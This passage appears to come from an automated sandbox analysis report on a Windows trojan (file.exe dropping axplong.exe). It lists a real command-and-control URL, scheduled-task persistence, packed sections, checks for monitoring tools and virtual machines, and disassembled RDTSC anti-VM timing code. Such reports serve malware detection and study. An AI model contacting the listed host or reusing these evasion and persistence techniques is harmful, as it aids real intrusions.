Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpyB

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B24CF0	6_2_00B24CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B63068	6_2_00B63068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B2E440	6_2_00B2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B57D83	6_2_00B57D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B24AF0	6_2_00B24AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B6765B	6_2_00B6765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B62BD0	6_2_00B62BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B68720	6_2_00B68720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B66F09	6_2_00B66F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B6777B	6_2_00B6777B

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973337448910081
Source: file.exe	Static PE information: Section: wygwfpzp ZLIB complexity 0.994612147990613
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973337448910081
Source: axplong.exe.0.dr	Static PE information: Section: wygwfpzp ZLIB complexity 0.994612147990613

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1949184 > 1048576

Source: file.exe

Static PE information: Raw size of wygwfpzp is bigger than: 0x100000 < 0x1aa200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1de863 should be: 0x1e1a8e
Source: file.exe	Static PE information: real checksum: 0x1de863 should be: 0x1e1a8e

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: wygwfpzp
Source: file.exe	Static PE information: section name: puucqgap
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: wygwfpzp
Source: axplong.exe.0.dr	Static PE information: section name: puucqgap
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00B3D84C push ecx; ret

6_2_00B3D85F

Source: file.exe	Static PE information: section name: entropy: 7.984881564074441
Source: file.exe	Static PE information: section name: wygwfpzp entropy: 7.954236015998608
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.984881564074441
Source: axplong.exe.0.dr	Static PE information: section name: wygwfpzp entropy: 7.954236015998608

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3F239 second address: F3F25C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD648BC9AD3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3EB58 second address: F3EB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C46FA second address: 10C4722 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD648BC9ACBh 0x00000008 jmp 00007FD648BC9AD5h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C4722 second address: 10C472C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C49CC second address: 10C49E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C49E5 second address: 10C49EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C49EC second address: 10C49F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7F5E second address: 10C7F87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD648C0B44Ch 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B454h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7F87 second address: 10C7F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FD648BC9AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7F92 second address: 10C802E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jp 00007FD648C0B45Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 jmp 00007FD648C0B454h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jns 00007FD648C0B44Ch 0x00000025 pushad 0x00000026 jmp 00007FD648C0B44Fh 0x0000002b jmp 00007FD648C0B458h 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 mov ch, 69h 0x00000035 lea ebx, dword ptr [ebp+1245CD6Ch] 0x0000003b mov dword ptr [ebp+122D2EA8h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD648C0B44Bh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C802E second address: 10C8038 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C809D second address: 10C8174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD648C0B44Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, dword ptr [ebp+122D3A4Ah] 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D39EAh] 0x0000001c push A2BBBAD3h 0x00000021 jmp 00007FD648C0B456h 0x00000026 add dword ptr [esp], 5D4445ADh 0x0000002d mov cx, bx 0x00000030 push 00000003h 0x00000032 je 00007FD648C0B44Ch 0x00000038 mov ecx, dword ptr [ebp+122D37F6h] 0x0000003e cld 0x0000003f push 00000000h 0x00000041 sub cl, 00000073h 0x00000044 mov dword ptr [ebp+12459A05h], edx 0x0000004a push 00000003h 0x0000004c call 00007FD648C0B449h 0x00000051 jmp 00007FD648C0B453h 0x00000056 push eax 0x00000057 pushad 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b pop edx 0x0000005c jmp 00007FD648C0B44Ch 0x00000061 popad 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 jmp 00007FD648C0B457h 0x0000006b mov eax, dword ptr [eax] 0x0000006d jmp 00007FD648C0B455h 0x00000072 mov dword ptr [esp+04h], eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 je 00007FD648C0B446h 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8174 second address: 10C81A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, dword ptr [ebp+122D3A4Eh] 0x00000010 lea ebx, dword ptr [ebp+1245CD75h] 0x00000016 ja 00007FD648BC9ACBh 0x0000001c sub si, 3B91h 0x00000021 mov dword ptr [ebp+122D2CE3h], edi 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C81A7 second address: 10C81AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8224 second address: 10C8228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8228 second address: 10C8266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FD648C0B448h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 or dx, 6500h 0x00000026 push 00000000h 0x00000028 mov cx, ax 0x0000002b push 8C249227h 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 pop edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8266 second address: 10C826C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C826C second address: 10C8270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8270 second address: 10C8274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8274 second address: 10C82F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 73DB6E59h 0x0000000f mov edi, 56AD0B1Ah 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D347Fh], ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FD648C0B448h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov ecx, edi 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FD648C0B448h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2986h], ebx 0x0000005c call 00007FD648C0B449h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FD648C0B451h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C82F5 second address: 10C833A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648BC9AD5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 jg 00007FD648BC9ACCh 0x00000017 pop edi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jbe 00007FD648BC9ADEh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FD648BC9AC6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C833A second address: 10C8371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007FD648C0B446h 0x00000013 jmp 00007FD648C0B458h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8371 second address: 10C8375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8375 second address: 10C838D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD648C0B446h 0x00000018 rdtsc
